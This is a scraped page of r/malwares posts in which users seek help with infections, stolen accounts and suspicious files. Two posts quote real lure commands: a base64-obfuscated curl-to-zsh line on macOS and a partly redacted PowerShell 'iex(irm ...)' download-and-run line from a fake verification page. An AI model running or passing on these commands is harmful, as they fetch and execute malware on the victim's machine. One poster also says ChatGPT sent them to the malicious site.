r/malwares

my cousins pc got a virus
▲ 113 r/malwares+1 crossposts

my cousins pc got a virus

yeah so he called me saying he needs help and he showed me this, i have no idea how he got this and he doesn’t know either, he told me about it because i usually help him with the computer stuff but this time i honestly don’t know what to do about it
he also got emails saying that someone tried logging into his discord and other apps, but i helped him change the passwords and secure everything so he’s good with that,
it’s just with his pc now, it’s literally dead and you can’t do much with it because this screen pops up everytime he boots up

so if there is any solution to this then please let me know it would mean a lot 🙏

u/thornzinmybuns — 13 hours ago
▲ 8 r/malwares+2 crossposts

RAT Trojan removal help?

Hi everyone,
My name is Bravey, and I’m looking for some advice because I’m pretty worried about a possible malware infection.
A few friends and I were making a Minecraft video, and we wanted to use the FapCraft mod. We found a website called fapcraftx.com and downloaded what we thought was the mod. All four of us downloaded the file, but I’m the only one who actually placed the JAR into my Minecraft mods folder and launched Minecraft with it through Modrinth.
When I launched the game, the mod showed up as an “Unknown” mod instead of displaying a normal name. It also didn’t seem to work correctly. Later, one of my friends checked the file with a Java malware scanner (I’m not sure exactly which one), and it reportedly detected something called “WeeDHack.” That’s when I started worrying that I may have run malware.
As soon as I found out, I took several steps:
Logged out of most of my important accounts.
Changed the passwords on the important accounts I could access immediately.
I haven’t changed the password to my main email yet because I don’t currently have access to the phone used for two-factor authentication. However, I did change the password to my backup email, which I use for account recovery.
Ran a full Microsoft Defender scan. It ran for around 8 hours. It cleaned up some files but never fully completed because I had to restart my computer.
Ran Malwarebytes afterward, which detected around 57-87 threats (I don’t remember the exact number). I quarantined/removed everything it found.
Ran a second Malwarebytes scan afterward, and it came back clean.
Since then, I haven’t noticed any suspicious logins, unauthorized account activity, or strange behavior on my PC. That said, I also haven’t really been using the computer because I’ve been afraid to.
My questions are:
Based on everything I’ve done, is there anything else I should do?
Is it possible that I’m still infected even though Malwarebytes is now clean?
Should I consider reinstalling Windows just to be safe?
Are there any logs or scan results I should upload that would help determine whether I’m actually infected?
Any advice would be greatly appreciated. Thanks for taking the time to read this.

reddit.com
u/LinkAnxious9194 — 1 day ago
▲ 2 r/malwares+1 crossposts

I need help guys

I instaled project zomboid from anker games i excluded folder ehere it is so it can be started it launch everything okay. But i then whant to check for viruses than i include folder and started scaning for viruses with microsoft defender and it found something caled Trojan HTML Rdirected virus i dont know. Than i clicked cuarantin and i domt know is it a bad thing or just false alarm. I deleted game and all files that i downloaded with a game.

PLEASE HELP IM SCARED!!!

PS. ( sorry for my bad english)

reddit.com
u/Glittering_Group9163 — 3 days ago
▲ 2 r/malwares+1 crossposts

i think i installed a virus/malware on my pc but am not sure. should i reset my pc with keeping my files or should wipe it clean?

so i downloaded a vice city trainer which i think was the malware/virus because after downloading it my pc became extremely slow but i am not 100% sure that this caused it. So, what should i do? completely clean my pc or keep my files.

reddit.com
u/_adityaaaaa_aa — 3 days ago
▲ 3 r/malwares+2 crossposts

Fully uninstalled trojan?

I recently accidentally installed trojanware on my pc, I ran a full scan which quarantined all the suspicious files and did a deep scan on malwarebytes that brought up 0 detections after 1.7 million file scans, and i double checked my task manager and saw no suspicious programs running. I've been disconnected from my internet while doing this just fo be safe, and I use a secure private browser and have no cookies added (i recently switched to it and deleted my old browser,) I just wanna be sure there's anywhere else I need to check to know i've fully uninstalled it. I'm somewhat knowledgeable in computers just not with viruses specifically so if there's anything I should double check id appeetiate the help, i'm PRETTY SURE ive gotten rid of it though. (btw the initial virus scan had 117 detections before I quarantined/deleted it. I'm running on the most recent version of windows 10)

reddit.com
u/PeronaIRL — 5 days ago
▲ 5 r/malwares+1 crossposts

Got hit by a virus (infostealer/session hijacker?)

Hey everyone,
I recently got hit by a virus on my PC, and I’m trying to figure out exactly what happened and if I’m fully secure now.

The Attack:
Shortly after the infection, my Facebook Messenger account was hijacked. It sent spam images of a "MrBeast Crypto Scam" to my contacts.
Here is the weird part: I only ever use Messenger on my PC via a web browser, and I always make it a habit to manually log out when I’m done. Does logging out not actually clear everything? Can a session hijacker or infostealer still bypass a logout using lingering browser cookies, cache, or session tokens?

My Cleanup Process:
As soon as I realized what happened, I went into full lockdown mode and did the following:

  1. Immediately disconnected my PC's Wi-Fi.
  2. Did a local reset from settings, followed by a completely clean OS install using a bootable USB drive.
  3. Used a completely different, clean device to change my Facebook password.
  4. Manually checked active sessions on FB and logged out all unknown devices.
  5. Turned on 2FA (App Authenticator + Phone Number) on FB.
  6. Changed my Google account password and enabled 2FA there too.

My Question:
Am I safe now, or is there any way they can still retain access? Also, if anyone can clarify how they managed to hijack my session even though I regularly log out, I’d love to understand the mechanics behind it. Thanks!

reddit.com
u/Sea-Lawyer-7180 — 4 days ago
▲ 15 r/malwares+2 crossposts

Malware possibly gave acess to all my passwords and data to a hacker. What should I do?

I dont know if this is the correct forum to post this. If not, let me know which one could help me. I downloaded some malicious virus or i dont know what it is while looking for mods for my games. I suspect that program gave all my data to a hacker, because i lost access to my steam account, roblox account and i know someone entered other apps, like EA and discord. I still suspect the malware is somewhere in my pc, and while i used diferent antivirus and all of them said that there was nothing wrong, i fear that someone could sell my stuff or directly impersonate me. Please help on how I can find this virus.

reddit.com
u/MrVargas019 — 6 days ago
▲ 1 r/malwares+1 crossposts

Décortiquer un malware

Bonjour,

Je suis novice, j'aimerais décortiquer un malware afin de trouver vers quel serveur il envoie nos informations.

Qui a une procédure et comment faire ?

Cordialement.

reddit.com
u/Fun_Fan_7760 — 6 days ago
▲ 3 r/malwares+1 crossposts

Fake reCaptcha Malware Problem

Hello everyone, unfortunately I'm facing a serious malware problem on my WordPress system.

First of all, I absolutely did not use any warex or null plugins or themes. Everything I used was purchased from the official WordPress website or Envato.

When I log in from my Mac (regardless of whether I access the web interface or the admin panel), a fake verification page appears.

https://preview.redd.it/yeakvdzbz1ah1.png?width=830&format=png&auto=webp&s=f5e27c8f179eae9721cd8d75b14b5b689fcc4e3a

I've been struggling with this problem for a long time; I absolutely can't find where the code is being generated in the background. I've deactivated all plugins and themes, deleted everything I wasn't using, and replaced the wp-admin and wp-includes folders with new files I downloaded from WordPress.

https://preview.redd.it/7rqvyx3202ah1.png?width=1944&format=png&auto=webp&s=4f170e9ac2b7ed770c3007d0ef042fb84c8e9dd6

https://preview.redd.it/etzlenm302ah1.png?width=1732&format=png&auto=webp&s=a0eddb9c78ea164136a534c404e6a40995bcb80a

https://preview.redd.it/04u3pmx402ah1.png?width=2454&format=png&auto=webp&s=d639159c81fc39160e6b3fc18e8104460e74967c

I deleted any potentially harmful JavaScript files, but they keep recreating themselves. I also checked all system files for potentially harmful things like Rival Base64, but found nothing.

What should I do?

Best regards

reddit.com
u/uniqeuser — 8 days ago
▲ 3 r/malwares+2 crossposts

Posible virus?

Ehhh sospechaba que tenia un virus en mi pc luego de instalar unos mods de minecraft para babric(fabric para versiones beta, no tiene nada que ver pero lo menciono) y que ninguno se ejecutara. Me dio de revisar C:/ y veo los ejecutables de la primera foto(MaptService.exe, MaptHelper.exe y WRP6023.tmp), los busqué por que me pareció raro que hubieran archivos así directamente en la raiz de C:/, los analice por virustotal y SecureAge marcó ambos .exe como malicioso y MaptHelper.exe MaxSecure lo marcó como trojano

MaptHelper: https://www.virustotal.com/gui/file/bc5ce39849c8d7e044fd973b0f59068171513fbabafb88b30010f733c0f34b00

MaptService: https://www.virustotal.com/gui/file/23b4ecbbc22cbd404147159aad8dc167d8200a900443c4561c10d332294e7579/summary

u/Alexddd29 — 7 days ago
▲ 3 r/malwares+2 crossposts

chrome_proxy.exe virus ?

bonjour, je regardais le gestionnaire des taches et après je suis allé dans l'onglet application de démarrage, et j'ai vu chrome_proxy.exe qui étais desactivé, j'ai fait un clique droit puis ouvrir emplacement du fichier et il se trouve dans le dossier chrome, je suis deja parti dans ce dossier une fois mais j'avais pas vu sa, et en plus j'ai vu que il y avais un nouveau dossier qui c'etais créé qui se nommais "149.0.7827.197", je l'ai ouvert, et je voit plein de fichier que je connais pas, il y en a qui m'on un peu marqué comme elevation_service.exe ou os_update_handler.exe.
si possible es que vous pouvez vous aussi ouvrir le dossier google\chrome\application et regarder ci il y a sa aussi, et si possible me dire si c'est un virus.
PS: si c'est un virus pas la peine de me dire quoi faire exactement je sais supprimer, je veux juste savoir si c'est un virus ou pas.

u/Victoiry1 — 6 days ago
▲ 1 r/malwares+1 crossposts

Mr beast discord hack

Hi i got hacked by the mr beast thing i wont be ln my computer for like 3 days and they are accesing everything my steam my gmail my epic games what can i do if im not home pls someone help.

reddit.com
u/pyromeeseestist — 7 days ago
▲ 2 r/malwares+1 crossposts

Domain account password changed after previous malware infection. Could the malware still be on my PC?

A while ago, my PC got infected with malware that stole a bunch of my saved passwords. After finding out, I changed all of my passwords (Google, email, etc.), ran a full Malwarebytes scan, and it found it, but it had trouble removing it. I found some info online and removed it manually, did 60 Microsoft offline scans and malwayrebytes scans, and it couldn't find anything.

Everything seemed fine after that.

However, today I found out that my work domain account password was changed without me doing it. I can no longer log into my domain account. This has me worried that the malware might still be on my computer, and now it's gonna be a struggle to get my account back. I have trouble understanding how the work account password changed, because if you want to change it they have a whole password hub site to change it and stuff like that.

My questions are:

  • Is it possible that the malware survived even though my antivirus detected and removed it?
  • Could it still be stealing passwords or session tokens?
  • At what point is a full Windows reinstall (formatting the drive) recommended instead of trusting the antivirus?
  • If I do reinstall Windows, can I safely back up important files to an external hard drive first, or is there a risk that the external drive could also become infected or compromised?
  • Are there any checks or tools I should run before deciding to wipe the PC?

I'd appreciate any advice from people who've dealt with info-stealing malware or password theft before. Thanks!

reddit.com
u/TheArmadilloHunters — 7 days ago
▲ 2 r/malwares+1 crossposts

Pasted Possible Virus into Terminal

Hi All,

A few months back I accidentally pasted this into terminal on my Mac from an ad. I didn’t know what it was and it asked for my password which I put in. What should I do to make sure my laptop is still safe to use? It’s been disconnected from wifi and been powered off ever since because I got spooked. I had the latest update of MacOS I could if that helps as well. I also went to the website but there was nothing on there. Can this somehow get into my wifi and if so what can I do?

echo “Apple-Installer: https://apps. apple.com/hiddenn-gift.application/ macOSAppleApicationSetup42145.dmg” && curl -kfsSL $(echo ‘aHR0cDovL2NsYXVzZG9vbS5jby56YS9jdXJsLzg5YTIyOWY5YTczY2ZmYzY3MDg5ZjM4OGM2YzEyZjNmOWQ4MGU3YWUyYzMyNzQ1Y2Q1MjEyNDIxYTg5yzN1NTA=‘ |base 64 -D)| zsh

reddit.com
u/Different_Cost_183 — 9 days ago
▲ 2 r/malwares+1 crossposts

Chat GPT just tried to get me to allow malicious activity on my PC

Was trying to look up the values of a console file for a project zomboid server.
Chat GPT said it was busy and it told me to visit another webpage.

https://preview.redd.it/c3p31p1kvh9h1.png?width=1887&format=png&auto=webp&s=53208dff707d794c8fa9b927116efe09f709f682

Once you get to that page, it immediately pops up to confirm you are not a robot

https://preview.redd.it/a7r4fpkqvh9h1.png?width=1885&format=png&auto=webp&s=44802bca8f578959ed0961b0442c9347561ce49f

Then it was obvious....

https://preview.redd.it/0uggm7otvh9h1.png?width=1907&format=png&auto=webp&s=2c83312e5604706694d9bc15026905f4530a4972

Attempting to get a user to open powershell and CNTRL+V Which out put something like this ...
(Code covered for obvious reasons)

powershell -w h -c "iex(irm 'verificationscodes.beer/xxxxxxxxxxxxxxxxx' -UseBasicParsing)"; exit <#Verification ID: xxxxxxxxxxxxxxx#>

Not today ChatGPT.....

That is crazy. That is the first time I have seen it re-route you to a non legit site that is malicious.....

reddit.com
u/Professional-Pen3416 — 10 days ago
▲ 3 r/malwares+1 crossposts

Is this malicious?

I downloaded an apk and this popped up on vírus total:PUA.AndroidOS.ApkSignatureKiller Is it malicious or can i download it without any worries? Also a pup popped up like this One:PUP/Android.SigKpm.1302671

reddit.com
u/ArtistSoft1809 — 10 days ago